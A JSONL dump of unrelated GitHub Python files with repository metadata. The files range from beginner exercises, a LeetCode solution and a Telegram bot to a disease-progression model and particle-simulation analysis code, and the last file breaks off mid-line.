+{"seq_id":"37241281142","text":"# Let us simplify the code a bit!\n\nfrom random import randint\n\npwd = ''\n\n# The variable \"n\" is not used.\n# Replace it with _\nfor _ in range(15):\n # pwd is assigned to itself plus\n # something more, let us use +=\n pwd += chr(randint(33, 127))\nprint(pwd)\n\n# Good!","repo_name":"ash/amazing_python3","sub_path":"365-simplify.py","file_name":"365-simplify.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"14236002959","text":"#Um professor quer sortear um dos seus quatro alunos para apagar o quadro. Faça um programa que ajude ele, lendo o\n# nome deles e escrevendo o nome do escolhido.\nfrom random import choice\npa = input('Primeiro aluno: ')\nsa = input('Segundo aluno: ')\nta = input('Terceiro aluno: ')\nqa = input('Quarto aluno: ')\nlista = [pa, sa, ta, qa]\ne = choice(lista)\nprint('O aluno escolhido foi \\033[4;1;37m{}\\033[m.'.format(e))\n","repo_name":"filipaBrandao/CursoemVideoPython","sub_path":"ex019.py","file_name":"ex019.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21204854294","text":"import time \n\n#this test changes the temp, humidity, ldr and ammnia data in run time\n\ndef changeReadData(readData, soundAnalysis):\n while True:\n time.sleep(1)\n readData[0] += 1\n readData[1] += 1\n readData[2] += 1\n readData[3] += 1\n\n soundAnalysis[0] += 1\n soundAnalysis[1] += 1\n\ndef displaysendData(sendData):\n while True:\n time.sleep(1)\n print(\"Heater: \", sendData[0])\n print(\"Fans: \", sendData[1])\n print(\"Lights: \", sendData[2])\n print(\"Servo: \", sendData[3])\n print(\"------------------------\")\n\n","repo_name":"AwaleSajil/PLF","sub_path":"Python All in one/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725203986","text":"class Solution(object):\n def deleteDuplicates(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n dummy = ListNode(0)\n dummy.next = head\n # pre代表是无重复链表\n pre = dummy\n # cur是探测是否有重复的指针\n cur = head\n\n while cur and cur.next:\n # 当cur检测到重复\n if cur.val == cur.next.val:\n temp = cur.val\n # 一直让cur移动到不重复区域\n while cur and temp == cur.val:\n cur = cur.next\n # 让pre连接到不重复区域\n pre.next = cur\n else:\n pre = pre.next\n cur = cur.next\n\n return dummy.next\n\n\"\"\"\n古城算法 7:00\nhttps://www.bilibili.com/video/BV1e5411c7JR/?spm_id_from=333.999.0.0&vd_source=b81616a45fd239becaebfee25e0dbd35\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/LinkedList/删除/82.单链表去重(不保留重复).py","file_name":"82.单链表去重(不保留重复).py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73912864784","text":"from random import randint\nimport turtle\n\nclass Point:\n \"\"\"Point class - to create a point having x & y coordinate\n \n Attributes:\n x: horizontal x-axis\n y: vertial y-axis\n \n Methods:\n falls_in_rectangle: return true if point exists inside rectangle and if not return false.\n \"\"\"\n def __init__(self, x, y) -> None:\n self.x = x\n self.y = y\n\n def falls_in_rectangle(self, rectangle):\n if rectangle.point1.x < self.x < rectangle.point2.x and rectangle.point1.y < self.y < rectangle.point2.y:\n return True\n else:\n return False\n\n\nclass Rectangle:\n \"\"\"rectangle class - made of two points i.e point1 & point2\n \n Attributes:\n point1: a point object\n point2: another point object\n \n Methods:\n area: return the area of the rectangle formed by those two points.\n \"\"\"\n def __init__(self, point1, point2) -> None:\n self.point1 = point1\n self.point2 = point2\n \n def area(self):\n return (self.point2.x - self.point1.x) * (self.point2.y - self.point1.y)\n\n\nclass GraphicalRectangle(Rectangle):\n \"\"\"creates a new window - for the rectangle\"\"\"\n def draw(self, canvas):\n\n # move from origin to point1\n canvas.penup()\n canvas.goto(self.point1.x, self.point1.y)\n\n # from point1 start drawing \n canvas.pendown()\n canvas.forward(self.point2.x - self.point1.x)\n canvas.left(90)\n canvas.forward(self.point2.y - self.point1.y)\n canvas.left(90)\n canvas.forward(self.point2.x - self.point1.x)\n canvas.left(90)\n canvas.forward(self.point2.y - self.point1.y)\n\n\nclass GraphicalPoint(Point):\n \"\"\"creates a graphival point in window\"\"\"\n def draw(self, canvas, size = 10, color= 'red'):\n canvas.penup()\n canvas.goto(self.x, self.y)\n\n canvas.pendown()\n canvas.dot(size, color)\n\nx = float(input(\"Enter x: \"))\ny = float(input(\"Enter y: \"))\n\npointA = GraphicalPoint(x, y)\n\n\nrectanglex = GraphicalRectangle(Point(randint(5, 90), randint(5, 90)), Point(randint(50, 200), randint(50, 200)))\n# rectanglex = GraphicalRectangle(Point(50, 100), Point(100,200))\nprint(f\"Rectangle point1: {rectanglex.point1.x}, {rectanglex.point1.y}\")\nprint(f\"Rectangle point2: {rectanglex.point2.x}, {rectanglex.point2.y}\")\n\nguessed_area = float(input(\"Guess area of rectangle: \"))\n\nprint(\"Area of rectangle: \", rectanglex.area())\n\nif not pointA.falls_in_rectangle(rectanglex):\n print(f\"Area off by: {rectanglex.area() - guessed_area}\")\nelse:\n print(\"Point is present inside rectangle\")\n\n\nmyturtle = turtle.Turtle()\nrectanglex.draw(canvas=myturtle)\npointA.draw(canvas=myturtle)\n\nturtle.done()\n\n\n\n\n\n","repo_name":"bhattaditya/Python-Projects","sub_path":"geometry/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40878736735","text":"class Chat(object):\n def __init__(self, id: int, type: str, **kwargs):\n self.id = id\n self.type = type\n for key in kwargs:\n setattr(self, key, kwargs[key])\n\n\nclass User(object):\n def __init__(self, id: int, **kwargs):\n self.id = id\n for key in kwargs:\n setattr(self, key, kwargs[key])\n\n\nclass IncomingMessage(object):\n def __init__(self, message_id: int, chat, **kwargs):\n self.message_id = message_id\n self.chat = Chat(**chat)\n for key in kwargs:\n if key == 'from':\n kwargs[key] = User(**kwargs[key])\n setattr(self, key, kwargs[key])\n\n\nclass CallbackQuery(object):\n def __init__(self, id: int, **kwargs):\n self.id = id\n for key in kwargs:\n if key == 'message':\n kwargs[key] = IncomingMessage(**kwargs[key])\n if key == 'from':\n kwargs[key] = User(**kwargs[key])\n setattr(self, key, kwargs[key])\n\n\nclass Update(object):\n def __init__(self, update_id: int, **kwargs):\n self.update_id = update_id\n for key in kwargs:\n if key == 'callback_query':\n kwargs[key] = CallbackQuery(**kwargs[key])\n if key == 'message':\n kwargs[key] = IncomingMessage(**kwargs[key])\n setattr(self, key, kwargs[key])\n","repo_name":"Appvelox/tgmsg","sub_path":"tgmsg/models/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43790147951","text":"import logging\n\nfrom aiogram import Bot, types, executor\nfrom aiogram.contrib.middlewares.logging import LoggingMiddleware\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.utils.executor import start_webhook\nfrom bot.settings import (BOT_TOKEN, HEROKU_APP_NAME,\n WEBHOOK_URL, WEBHOOK_PATH,\n WEBAPP_HOST, WEBAPP_PORT)\n\nbot = Bot(token=BOT_TOKEN)\ndp = Dispatcher(bot)\ndp.middleware.setup(LoggingMiddleware())\n\n\n@dp.message_handler(commands=['hello'])\nasync def send_welcome(message: types.Message):\n await message.reply('Hi!\\n Im KBot.')\n\n\n@dp.message_handler(regexp='(^cat[s]?$|puss|кот[ик]|киса)')\nasync def cats(message: types.Message):\n with open('data/cats.jpg', 'rb') as photo:\n await message.reply_photo(photo, caption='Cats r here.')\n\n\nasync def on_startup(dp):\n logging.warning('Starting connection.')\n await bot.set_webhook(WEBHOOK_URL, drop_pending_updates=True)\n\n\nasync def on_shutdown(dp):\n logging.warning('Shutting down webhook connection.')\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n start_webhook(\n dispatcher=dp,\n webhook_path=WEBHOOK_PATH,\n skip_updates=True,\n on_startup=on_startup,\n host=WEBAPP_HOST,\n port=WEBAPP_PORT,\n )\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)\n","repo_name":"sherifflight/kbot","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7982030026","text":"import os\nimport shutil\n\nremove_dirs = []\n\nfor root, dirs, files in os.walk(\"preprocessed\"):\n if root.endswith(\"\\processed\") or root.endswith(\"raw\"):\n remove_dirs.append(root)\n\nfor remove_dir in remove_dirs:\n print(remove_dir)\n shutil.rmtree(remove_dir)\n","repo_name":"thcheung/DSCAN","sub_path":"remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5676345093","text":"import numpy as np\nimport scipy as sp\n\nclass ParHierModel:\n\n def __init__(self, dysfuncParams, thetas, mapBiomkToFuncUnits, parFunc, sigmaB):\n self.dysfuncParams = dysfuncParams\n self.thetas = thetas\n self.mapBiomkToFuncUnits = mapBiomkToFuncUnits\n self.parFunc = parFunc # parametric function\n self.sigmaB = sigmaB\n self.nrBiomk = thetas.shape[0]\n self.nrFuncUnits = np.unique(mapBiomkToFuncUnits).shape[0]\n\n # self.subShiftsLongTrue = subShiftsLongTrue\n # self.subShiftsCrossTrue = subShiftsLongTrue[long2crossInd]\n\n\n def timeShiftFuncCross(self, ageAtVisitCross):\n\n return ageAtVisitCross + self.subShiftsCrossTrue\n\n\n def predPopBiomk(self, dpsCross, b):\n '''\n Predict population-level effect f_b (X) evaluated at dps (X) for biomarker b\n\n :param dpsCross: 1D disease progression scores for all subjects and visits, or X\n :param b: biomarker nr\n :return: Y = f_b (X)\n '''\n\n # find dysfunction scores for each subject\n dysScoresS = self.parFunc(dpsCross, self.dysfuncParams[self.mapBiomkToFuncUnits[b],:])\n modelPredS = self.parFunc(dysScoresS, self.thetas[b,:])\n\n return modelPredS\n\n def predPopDys(self, dpsCross):\n '''\n Predict population-level effect f_b (X) evaluated at dps (X) for biomarker b\n\n :param dpsCross: 1D disease progression scores for all subjects and visits, or X\n :param b: biomarker nr\n :return: Y = f_b (X)\n '''\n\n dysScoresSU = np.zeros((dpsCross.shape[0], self.nrFuncUnits), float)\n\n # find dysfunction scores for each subject\n for u in range(self.nrFuncUnits):\n dysScoresSU[:,u] = self.parFunc(dpsCross, self.dysfuncParams[u,:])\n\n assert dysScoresSU.shape[0] == dpsCross.shape[0]\n assert dysScoresSU.shape[1] == self.nrFuncUnits\n\n return dysScoresSU\n\n def predPopFromDysfunc(self, dysScoresS):\n '''\n Predict population-level effect f_b (X) evaluated at dps (X) for biomarker b\n\n :param dpsCross: 1D disease progression scores for all subjects and visits, or X\n :param b: biomarker nr\n :return: Y = f_b (X)\n '''\n\n modelPredSB = np.zeros((dysScoresS.shape[0], self.nrBiomk), float)\n\n # find dysfunction scores for each subject\n for b in range(self.nrBiomk):\n modelPredSB[:,b] = self.parFunc(dysScoresS, self.thetas[b, :])\n\n return modelPredSB\n\n def predPop(self, dpsCross):\n '''\n Predict population-level effect f(X) = [f_1(X) .. f_n(X)] evaluated at dps (X) for all biomarkers\n\n :param dpsCross: 1D disease progression scores for all subjects and visits, or X\n :return: Y = f(X)\n '''\n\n modelPredSB = np.zeros((dpsCross.shape[0], self.nrBiomk), float)\n\n dysScoresSF = self.predPopDys(dpsCross)\n\n for b in range(self.nrBiomk):\n f = self.mapBiomkToFuncUnits[b]\n print(dysScoresSF.shape)\n print(self.thetas[b, :].shape)\n modelPredSB[:,b] = self.parFunc(dysScoresSF[:,f], self.thetas[b, :])\n\n assert modelPredSB.shape[0] == dpsCross.shape[0]\n assert modelPredSB.shape[1] == self.nrBiomk\n\n return modelPredSB\n\n def genDataIID(self, dpsCross):\n dataCrossSB = np.zeros((dpsCross.shape[0], self.nrBiomk), float)\n\n for b in range(self.nrBiomk):\n dataCrossSB[:,b] = self.predPopBiomk(dpsCross, b) + np.random.normal(0,self.sigmaB[b], dpsCross.shape[0])\n\n assert dataCrossSB.shape[0] == dpsCross.shape[0]\n assert dataCrossSB.shape[1] == self.nrBiomk\n\n return dataCrossSB\n\n @staticmethod\n def makeLongArray(array, scanTimepts, partCode, uniquePartCode):\n # place data in a longitudinal format\n longArray = [] # longArray can be data, diag, ageAtScan,scanTimepts, etc .. both 1D or 2D\n nrParticipants = len(uniquePartCode)\n\n longCounter = 0\n\n for p in range(nrParticipants):\n # print('Participant %d' % uniquePartCode[p])\n currPartIndices = np.where(partCode == uniquePartCode[p])[0]\n currPartTimepoints = scanTimepts[currPartIndices]\n currPartTimeptsOrdInd = np.argsort(currPartTimepoints)\n # print uniquePartCode[p], currPartIndices, currPartTimepoints, currPartTimeptsOrdInd\n currPartIndicesOrd = currPartIndices[currPartTimeptsOrdInd]\n # print(uniquePartCode[p], currPartIndicesOrd)\n\n # assert(len(currPartTimeptsOrdInd) >= 2) # 2 for PET, 3 for MRI\n\n # if len(currPartTimeptsOrdInd) > 1:\n longArray += [array[currPartIndicesOrd]]\n\n return longArray","repo_name":"razvanmarinescu/dkt","sub_path":"ParHierModel.py","file_name":"ParHierModel.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"20783562486","text":"import netCDF4\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom glob import glob\nimport os\nimport vg\nfrom scipy import stats\nfrom mayavi import mlab\nfrom math import ceil, floor\n# mlab.options.backend = 'envisage'\n\nimport sys\n# sys.path.append('/home/alexander/Documents/surface_mixing/Analysis/')\n# from ana_objects import ParticleData\n\nall = ['reformat_for_animate', 'reformat_for_voronoi', 'histogram_cell_velocities', 'plot_densities', 'plot_voro_concs', 'plot_polar_angles', 'plot_polar_angles_superimposed',\n 'plot_trajectories', 'plot_particlewise_angles', 'plot_particlewise_velocities', 'plot_particlewise_vorticities']\n\n# Load matplotlib style file\n# plt.style.use('/home/alexander/Documents/turbulence-patchiness-sims/simulations/analysis/analysis_tools/plotstyle.mplstyle')\n\n\ndef reformat_for_animate(filepath):\n \"\"\"\n A method to take the native parcels netcdf4 output file and reformat the particle position data to a matplotlib\n 3D scatterplot-friendly format.\n\n :param filepath: path to the netCDF file containing particle trajectories WITHOUT THE .NC\n \"\"\"\n particlefile = netCDF4.Dataset(str(filepath + \".nc\"))\n\n num_frames = particlefile.variables[\"lon\"].shape[1]\n\n masked = np.ma.is_masked(particlefile.variables[\"lon\"][:])\n\n if masked:\n lons = particlefile.variables[\"lon\"][:].data[:, 0]\n lats = particlefile.variables[\"lat\"][:].data[:, 0]\n deps = particlefile.variables[\"z\"][:].data[:, 0]\n for f in tqdm(range(num_frames-1)):\n lons = np.vstack((lons, particlefile.variables[\"lon\"][:].data[:, f + 1]))\n lats = np.vstack((lats, particlefile.variables[\"lat\"][:].data[:, f + 1]))\n deps = np.vstack((deps, particlefile.variables[\"z\"][:].data[:, f + 1]))\n else:\n lons = particlefile.variables[\"lon\"][:][:, 0]\n lats = particlefile.variables[\"lat\"][:][:, 0]\n deps = particlefile.variables[\"z\"][:][:, 0]\n for f in tqdm(range(num_frames-1)):\n lons = np.vstack((lons, particlefile.variables[\"lon\"][:][:, f + 1]))\n lats = np.vstack((lats, particlefile.variables[\"lat\"][:][:, f + 1]))\n deps = np.vstack((deps, particlefile.variables[\"z\"][:][:, f + 1]))\n\n filedir = os.path.dirname(filepath)\n np.save(os.path.join(filedir, \"lons.npy\"), lons) #np.save(filepath + '_lons.npy', lons)\n np.save(os.path.join(filedir, \"lats.npy\"), lats) #np.save(filepath + '_lats.npy', lats)\n np.save(os.path.join(filedir, \"deps.npy\"), deps) #np.save(filepath + '_deps.npy', deps)\n\n particlefile.close()\n\n\ndef reformat_for_voronoi(filedir, timesteps):\n \"\"\"\n A method to take the lon, lat, dep .npy files containing particle position data from a simulations and reformat for\n and reformat to a text file(s) of the format required by Voronoi tesselation library voro++ at each given timestep.\n\n voro++ requires a .txt file as an input. Each row in this file takes the form:\n\n <Numerical ID label> <x coordinate> <y coordinate> <z coordinate>\n\n representing a particle's position at the given time. The output is a .vol text file of the exact same format but\n with an additional column containing the Voronoi cell volume for each particle:\n\n <Numerical ID label> <x coordinate> <y coordinate> <z coordinate> <Voronoi cell volume>\n\n :param filedir: path to the directory containing particle lon.npy, lat.npy, dep.npy files.\n\n :param timesteps: List of timesteps for which to produce voro++ input files.\n \"\"\"\n if not isinstance(timesteps, list):\n raise TypeError(\"timesteps must be provided as a list.\")\n\n dx = 600/720\n print(\"dx = %f ENSURE THIS IS CORRECT FOR YOUR SIM AND YOUR CHOICE OF VOLUME UNITS\" %dx)\n\n lons = np.load(os.path.join(filedir, \"lons.npy\"))\n lats = np.load(os.path.join(filedir, \"lats.npy\"))\n deps = np.load(os.path.join(filedir, \"deps.npy\"))\n\n n = lons.shape[1]\n\n for t in tqdm(timesteps):\n savepath = os.path.join(filedir, \"vor/in/vor_mm_%03d.txt\" % t)\n points = np.stack((np.arange(n), lons[t, :] * dx, lats[t, :] * dx, deps[t, :] * dx), axis=1)\n np.savetxt(savepath, points, fmt=[\"%d\", \"%10.5f\", \"%10.5f\", \"%10.5f\"])\n\n\ndef histogram_cell_velocities(filepaths, n_bins, saveplot=None):\n \"\"\"\n A method to check the velocities in each cell of the fluid simulation and return a histogram of them, to help\n determining the Courant number.\n\n :param filepaths: String or list of strings representing the path(s) to the file(s).\n\n :param n_bins: Int representing number of bins to pass to np.histogram()\n\n :param plot: Boolean indicating whether to produce the histogram plot or just compute the H-array and bin edges.\n\n :return: H : array containing the values of the histogram. See density and weights for a description of the\n possible semantics.\n\n :return: bin_edges : array of dtype float containing the bin edges.\n \"\"\"\n\n count = 0\n\n paths = sorted(glob(str(filepaths))) if not isinstance(filepaths, list) else filepaths\n if len(paths) == 0:\n notfound_paths = filepaths\n raise IOError(\"FieldSet files notplot_entropies found: %s\" % str(notfound_paths))\n with tqdm(total=len(paths)) as pbar:\n for fp in paths:\n if not os.path.exists(fp):\n raise IOError(\"FieldSet file not found: %s\" % str(fp))\n\n nc = netCDF4.Dataset(fp)\n\n vels = np.power(np.power(nc.variables[\"u\"][:], 2) + np.power(nc.variables[\"v\"][:], 2) + np.power(nc.variables[\"w\"][:], 2), 0.5)\n if count==0:\n vmax = np.max(vels)\n\n nc.close()\n\n if count == 0:\n H, bin_edges = np.histogram(vels, bins=n_bins, range=(0, vmax))\n else:\n H += np.histogram(vels, bins=bin_edges)[0]\n\n count += 1\n pbar.update(1)\n\n if saveplot is not None:\n width = (bin_edges[1] - bin_edges[0])\n\n fig = plt.figure()\n\n # plot pdf\n plt_pdf = fig.add_subplot(1, 2, 1)\n plt_pdf.bar(bin_edges[1:], H, width=width)\n xlim = plt_pdf.get_xlim()\n\n # plot cdf\n plt_cdf = fig.add_subplot(1, 2, 2)\n plt_cdf.set_xlim(xlim)\n plt_cdf.set_ylim(0., 1.)\n n = sum(H)\n x = bin_edges\n y = np.append(np.zeros(1), np.cumsum(H) / n)\n plt_cdf.plot(x, y)\n\n # compute cutoffs and plot as vertical red lines on both plots\n cutoff_50 = np.argmax(y >= 0.5)\n cutoff_95 = np.argmax(y >= 0.95)\n cutoff_99 = np.argmax(y >= 0.99)\n plt_pdf.axvline(x[cutoff_50], ymin=0., ymax=plt_pdf.get_ylim()[1], color='limegreen')\n plt_pdf.axvline(x[cutoff_95], ymin=0., ymax=plt_pdf.get_ylim()[1], color='r')\n plt_pdf.axvline(x[cutoff_99], ymin=0., ymax=plt_pdf.get_ylim()[1], color='r')\n pdf_text_ypos = 0.9 * plt_pdf.get_ylim()[1]\n plt_pdf.text(x[cutoff_50], pdf_text_ypos, \"x=%0.2f\" % x[cutoff_50], fontsize=18, color='limegreen')\n plt_pdf.text(x[cutoff_95], pdf_text_ypos, \"x=%0.2f\" % x[cutoff_95], fontsize=18, color='r')\n plt_pdf.text(x[cutoff_99], pdf_text_ypos, \"x=%0.2f\" % x[cutoff_99], fontsize=18, color='r')\n plt_cdf.axvline(x[cutoff_50], ymin=0., ymax=plt_cdf.get_ylim()[1], color='limegreen')\n plt_cdf.axvline(x[cutoff_95], ymin=0., ymax=1., color='r')\n plt_cdf.axvline(x[cutoff_99], ymin=0., ymax=1., color='r')\n cdf_text_ypos = 0.9 * plt_cdf.get_ylim()[1]\n plt_cdf.text(x[cutoff_50], cdf_text_ypos, \"x=%0.2f\" % x[cutoff_50], fontsize=18, color='limegreen')\n plt_cdf.text(x[cutoff_95], cdf_text_ypos, \"x=%0.2f\" % x[cutoff_95], fontsize=18, color='r')\n plt_cdf.text(x[cutoff_99], cdf_text_ypos, \"x=%0.2f\" % x[cutoff_99], fontsize=18, color='r')\n\n # set labels, titles, etc...\n plt_pdf.set_title(\"Histogram\", fontsize=20)\n plt_pdf.set_xlabel(\"Velocity Magnitudes (m/s)\", fontsize=18)\n plt_pdf.set_ylabel(\"Count\", fontsize=18)\n\n plt_cdf.set_title(\"CDF\", fontsize=20)\n plt_cdf.set_xlabel(\"Velocity Magnitudes (m/s)\", fontsize=18)\n plt_cdf.set_ylabel(\"Fraction of Data\", fontsize=18)\n\n plt.savefig(saveplot)\n\n return H, bin_edges\n\n\ndef plot_densities(filepath, savepath=None):\n \"\"\"\n This method uses the mayavi library to produce 3D density plots of a particle simulation.\n :param filepath: string representing the path to netCDF file containing particle position data (EXCLUDING THE .nc)\n :param savepath: string representing where to save the density plots.\n \"\"\"\n timestamps = np.linspace(0, 300, 31, dtype=int).tolist()\n lons = np.load(os.path.join(filepath, \"lons.npy\"))\n lats = np.load(os.path.join(filepath, \"lats.npy\"))\n deps = np.load(os.path.join(filepath, \"deps.npy\"))\n density = np.load(os.path.join(filepath, \"density.npy\"))\n density = density[:, :, 0:180, :]\n min = density.min()\n max = density.max()\n xmin, ymin, zmin = (0., 0., 0.)\n xmax, ymax, zmax = (720., 720., 360.)\n xi, yi, zi = density.shape[0:3]\n xi, yi, zi = np.mgrid[xmin:xmax:xi*1j, ymin:ymax:yi*1j, zmin:zmax:zi*1j]\n\n # for t in tqdm(range(density.shape[3])):\n # figure = mlab.figure('DensityPlot', bgcolor=(1., 1., 1.), fgcolor=(0.,0.,0.), size=(720, 720))\n # grid = mlab.pipeline.scalar_field(xi, yi, zi, density[:, :, :, t])\n # #mlab.pipeline.volume(grid, vmin=min + .2 * (max - min), vmax=min + .8 * (max - min))\n # # vol_lowconc = mlab.pipeline.volume(grid, vmin=0., vmax=min + .25 * (max - min), color=(1., 0., 0.))\n # vol_highconc = mlab.pipeline.volume(grid, vmin=min + .75 * (max - min), vmax=max, color=(0., 0., 1.))\n # mlab.axes()\n # mlab.view(azimuth=45, elevation=235, distance=2500, focalpoint=(xmax/2., ymax/2., zmax/2.))\n # # mlab.view(azimuth=-45, elevation=315, distance=2500, focalpoint=(xmax/2., ymax/2., zmax/2.))\n # # mlab.show()\n # if savepath is not None:\n # mlab.savefig(savepath + \"%03.0f\" % t + \"dead.png\")\n # mlab.clf()\n\n for t in tqdm(range(density.shape[3])):\n x = lons[timestamps[t], ~np.isnan(lons[timestamps[t], :])]\n y = lats[timestamps[t], ~np.isnan(lats[timestamps[t], :])]\n z = deps[timestamps[t], ~np.isnan(deps[timestamps[t], :])]\n\n xyz = np.vstack([x, y, z])\n kde = stats.gaussian_kde(xyz)\n density = kde(xyz)\n min=density.min()\n max=density.max()\n f = 0.5\n f_cutoff = min + 0.5*(max-min)\n colors = np.zeros((len(x), 4)).astype(np.uint8)\n for i in range(x.size):\n colors[i, 0] = 255 * (density[i] < f_cutoff)\n colors[i, 2] = 255 * (density[i] > f_cutoff)\n colors[i, 3] = int(255 * 0.2) * (density[i] > f_cutoff) + int(255 * 0.99) * (density[i] < f_cutoff)\n\n # Plot scatter with mayavi\n figure = mlab.figure('DensityPlot', bgcolor=(1., 1., 1.), fgcolor=(0., 0., 0.), size=(720, 720))\n pts = mlab.points3d(x, y, z, density, colormap='blue-red', scale_mode='none', scale_factor=2)\n pts.module_manager.scalar_lut_manager.lut.table = colors\n mlab.axes()\n mlab.draw()\n mlab.savefig(savepath + \"%03.0f\" % t + \".png\")\n mlab.clf()\n\n\ndef plot_voro_concs(filepath, savepath=None):\n \"\"\"\n This method uses the mayavi library to produce 3D density plots of a particle simulation based on the reciprocal of\n of the volume of the voronoi cells.\n :param filepath: string representing the path to netCDF file containing particle position data (EXCLUDING THE .nc)\n :param savepath: string representing where to save the density plots.\n \"\"\"\n timestamps = np.linspace(0, 300, 31, dtype=int).tolist()\n lons = np.load(os.path.join(filepath, \"lons.npy\"))[timestamps, :]\n lats = np.load(os.path.join(filepath, \"lats.npy\"))[timestamps, :]\n deps = np.load(os.path.join(filepath, \"deps.npy\"))[timestamps, :]\n vols = np.load(os.path.join(filepath, \"vols.npy\"))\n concs = np.reciprocal(vols)\n\n for t in [26]:#tqdm(range(31)):\n not_nans = ~np.isnan(lons[t, :])\n x = lons[t, not_nans]\n y = lats[t, not_nans]\n z = deps[t, not_nans]\n c = concs[not_nans, t]\n x = x[z>1]\n y = y[z>1]\n c = c[z>1]\n z = z[z>1]\n\n # Plot scatter with mayavi\n figure = mlab.figure('DensityPlot', bgcolor=(1., 1., 1.), fgcolor=(0., 0., 0.), size=(720, 720))\n pts = mlab.points3d(x, y, z, np.log10(c), colormap='blue-red', scale_mode='scalar', scale_factor=1., transparent=True)\n # pts.module_manager.scalar_lut_manager.lut.table = colors\n # pts.mlab_source.dataset.point_data.scalars = c\n\n # s = np.ones_like(x)\n # pts = mlab.quiver3d(x, y, z, s, s, s, scalars=c, mode=\"sphere\", scale_factor=.5)\n # pts.glyph.color_mode = 'color_by_scalar'\n # pts.glyph.glyph_source.glyph_source.center = [0, 0, 0]\n\n mlab.axes()\n mlab.draw()\n mlab.savefig(savepath + \"%03.0f\" % t + \".png\")\n # mlab.clf()\n\n\n\n# def plot_entropies(filepath):\n# tload = [0, -1]\n# # time_origin=datetime.datetime(2000,1,5)\n# # Times = [(time_origin + datetime.timedelta(days=t * 5)).strftime(\"%Y-%m\") for t in tload]\n#\n# # def reduce_particleset():\n# # # Load particle data\n# # pdir = datadir + 'MixingEntropy/' # Data directory\n# # fname = 'surfaceparticles_y2000_m1_d5_simdays3650_pos' # F\n# #\n# # # load data\n# # pdata = ParticleData.from_nc(pdir=pdir, fname=fname, Ngrids=40, tload=tload)\n# # pdata.remove_nans()\n# #\n# # # Get those particles that start and end in the chosen basin\n# # r = np.load(outdir_paper + \"EntropyMatrix/Entropy_Clusters.npy\")\n# #\n# # for i_basin in range(1, 6): # loop over basins as defined in figure 3a)\n# #\n# # print('--------------')\n# # print('BASIN: ', i_basin)\n# # print('--------------')\n# #\n# # # define basin region\n# # basin = np.array([1 if r[i] == i_basin else 0 for i in range(len(r))])\n# #\n# # # constrain to particles that start in the respective basin\n# # l = {0: basin}\n# # basin_data = pdata.get_subset(l, 2.)\n# #\n# # # select particles that are in the basin each subsequent year\n# # for t in range(len(tload)):\n# # l[t] = basin\n# # basin_data = pdata.get_subset(l, 2.)\n# #\n# # lons = basin_data.lons.filled(np.nan)\n# # lats = basin_data.lats.filled(np.nan)\n# # times = basin_data.times.filled(np.nan)\n# # np.savez(outdir_paper + 'EntropyMatrix/Reduced_particles_' + str(i_basin), lons=lons, lats=lats,\n# # times=times)\n#\n# pdata = ParticleData.from_nc(filepath, \"\", tload)\n#\n#\n# def compute_transfer_matrix():\n# # deg_labels is the choice of square binning\n#\n# for i_basin in range(1, 6):\n#\n# # load reduced particle data for each basin\n# pdata = np.load(outdir_paper + 'EntropyMatrix/Reduced_particles_' + str(i_basin) + '.npz', 'r')\n# lons = pdata['lons']\n# lats = pdata['lats']\n# times = pdata['times']\n# del pdata\n# pdata_ocean = ParticleData(lons=lons, lats=lats, times=times)\n#\n# # Define labels according to initial position\n# transfer_matrix = {}\n# pdata_ocean.set_labels(deg_labels, 0)\n# l0 = pdata_ocean.label\n# N = len(np.unique(l0))\n#\n# # get existing labels and translate them into labels 0, ...., N-1\n# unique, counts = np.unique(l0, return_counts=True)\n# py_labels = dict(list(zip(unique, list(range(N)))))\n# original_labels = dict(list(zip(list(range(N)), unique)))\n#\n# # compute transfer matrix\n# for t in range(0, len(lons[0])):\n# n = np.zeros((N, N))\n# pdata_ocean.set_labels(deg_labels, t)\n# l = pdata_ocean.label\n#\n# for j in range(len(l)):\n# if l[j] in l0: # restrict to the existing labels (at t=0)\n# n[py_labels[l0[j]], py_labels[l[j]]] += 1\n#\n# transfer_matrix[t] = n\n#\n# np.savez(outdir_paper + 'EntropyMatrix/n_matrix_deg' + str(int(deg_labels)) + '/n_matrix_' + str(i_basin),\n# n=transfer_matrix, original_labels=original_labels)\n#\n# def plot_spatial_entropy():\n# # function to get the spatial entropy\n#\n# Lons_edges = np.linspace(-180, 180, int(360 / deg_labels) + 1)\n# Lats_edges = np.linspace(-90, 90, int(180 / deg_labels) + 1)\n# Lons_centered = np.array([(Lons_edges[i] + Lons_edges[i + 1]) / deg_labels for i in range(len(Lons_edges) - 1)])\n# Lats_centered = np.array([(Lats_edges[i] + Lats_edges[i + 1]) / deg_labels for i in range(len(Lats_edges) - 1)])\n#\n# fig = plt.figure(figsize=(12, 8))\n# gs1 = gridspec.GridSpec(2, 